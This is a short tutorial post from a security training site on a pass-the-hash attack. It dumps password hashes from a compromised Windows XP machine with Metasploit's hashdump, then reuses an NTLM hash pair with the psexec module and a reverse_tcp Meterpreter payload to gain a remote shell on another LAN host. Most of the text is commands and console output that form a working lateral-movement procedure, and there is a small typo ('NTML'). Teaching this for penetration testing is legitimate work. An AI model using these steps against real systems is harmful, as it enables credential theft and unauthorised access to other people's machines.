Pass The Hash

July 14, 2015 | Views: 2765

Begin Learning Cyber Security for FREE Now!

FREE REGISTRATIONAlready a Member Login Here

Hi once again,

Using this method, all we need is an SMB ( LAN ) fully compromised PC user-name, as we have recently exploited WindowsXp SP 2. Now that we know his user-name, we need to move into the LAN to other PCs.

Let’s begin…

Running the Metasploit console, I assume you have Metasploit opened and have configured our target there. So, let us start with Meterpreter. I will now write a plain/full terminal command because you know the basics.

We’re going to use "post/windows/gather/hashdump" You can locate it by locating/ searching in terminal. We have accessed CMD recently. We can even cat system login information file ( named / known as SAM ). His hash will be in the format of NTML which is easy to decrypt. But, in our purpose we need to pass the hash directly to it, so we need to use the hashdump in terminal.

meterpreter > run post/windows/gather/hashdump

[*] Obtaining the boot key...
[*] Calculating the hboot key using SYSKEY 8528c78df7ff55040196a9b670f114b6...
[*] Obtaining the user list and keys...
[*] Decrypting user keys...
[*] Dumping password hashes...


Knowing that we have the hash, let’s use `psexec exploit` to pass that. Open one more terminal in a new instance and open msf console there. We know we need to use `psexec` but we didn’t know his location / full path. Let’s search for it.

msf > search psexec


Name                       Description
----                       -----------
windows/smb/psexec         Microsoft Windows Authenticated User Code Execution
windows/smb/smb_relay      Microsoft Windows SMB Relay Code Execution

YES! We got it. Now, let’s use it.

msf > use exploit/windows/smb/psexec
msf exploit(psexec) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(psexec) > set LHOST xx.xx.xx.xx
LHOST => xx.xx.xx.xx
msf exploit(psexec) > set LPORT 443
LPORT => 443
msf exploit(psexec) > set RHOST xx.xx.xx.xx
RHOST => xx.xx.xx.xx
msf exploit(psexec) > show options

Module options:

Name     Current Setting  Required  Description
----     ---------------  --------  -----------
RHOST    xx.xx.xx.xx      yes       The target address
RPORT    445              yes       Set the SMB service port
SMBPass                   no        The password for the specified username
SMBUser  Administrator    yes       The username to authenticate as

Payload options (windows/meterpreter/reverse_tcp):

Name      Current Setting  Required  Description
----      ---------------  --------  -----------
EXITFUNC  thread           yes       Exit technique: seh, thread, process
LHOST     xx.xx.xx.xx      yes       The local address
LPORT     443              yes       The local port

Exploit target:

Id  Name
--  ----
0   Automatic

Set the SMBPass
msf exploit(psexec) > set SMBPass e52cac67419a9a224a3b108f3fa6cb6d:8846f7eaee8fb117ad06bdd830b7586c
SMBPass => e52cac67419a9a224a3b108f3fa6cb6d:8846f7eaee8fb117ad06bdd830b7586c
msf exploit(psexec) > exploit

[*] Connecting to the server...
[*] Started reverse handler
[*] Authenticating as user 'Administrator'...
[*] Uploading payload...
[*] Created KoVCxCjx.exe...
[*] Binding to 367abb81-9844-35f1-ad32-98f038001003:2.0@ncacn_np:xx.xx.xx.xx[svcctl] ...
[*] Bound to 367abb81-9844-35f1-ad32-98f038001003:2.0@ncacn_np:xx.xx.xx.xx[svcctl] ...
[*] Obtaining a service manager handle...
[*] Creating a new service (XKqtKinn - "MSSeYtOQydnRPWl")...
[*] Closing service handle...
[*] Opening service...
[*] Starting the service...
[*] Removing the service...
[*] Closing service handle...
[*] Deleting KoVCxCjx.exe...
[*] Sending stage (719360 bytes)
[*] Meterpreter session 1 opened (xx.xx.xx.xx:443 -> xx.xx.xx.xx:1045)

Yeah! We got it.
meterpreter > shell
Process 3680 created.
Channel 1 created.
Microsoft Windows [Version 5.2.3790] (C) Copyright 1985-2003 Microsoft Corp.


Voila! One more down. Now we have full access to it.

— Multi Thinker

Share with Friends
Use Cybytes and
Tip the Author!
Share with Friends
Ready to share your knowledge and expertise?
1 Comment
  1. Authentication fails ????

Comment on This

You must be logged in to post a comment.

Our Revolution

We believe Cyber Security training should be free, for everyone, FOREVER. Everyone, everywhere, deserves the OPPORTUNITY to learn, begin and grow a career in this fascinating field. Therefore, Cybrary is a free community where people, companies and training come together to give everyone the ability to collaborate in an open source way that is revolutionizing the cyber security educational experience.

Cybrary On The Go

Get the Cybrary app for Android for online and offline viewing of our lessons.

Get it on Google Play

Support Cybrary

Donate Here to Get This Month's Donor Badge

Skip to toolbar

We recommend always using caution when following any link

Are you sure you want to continue?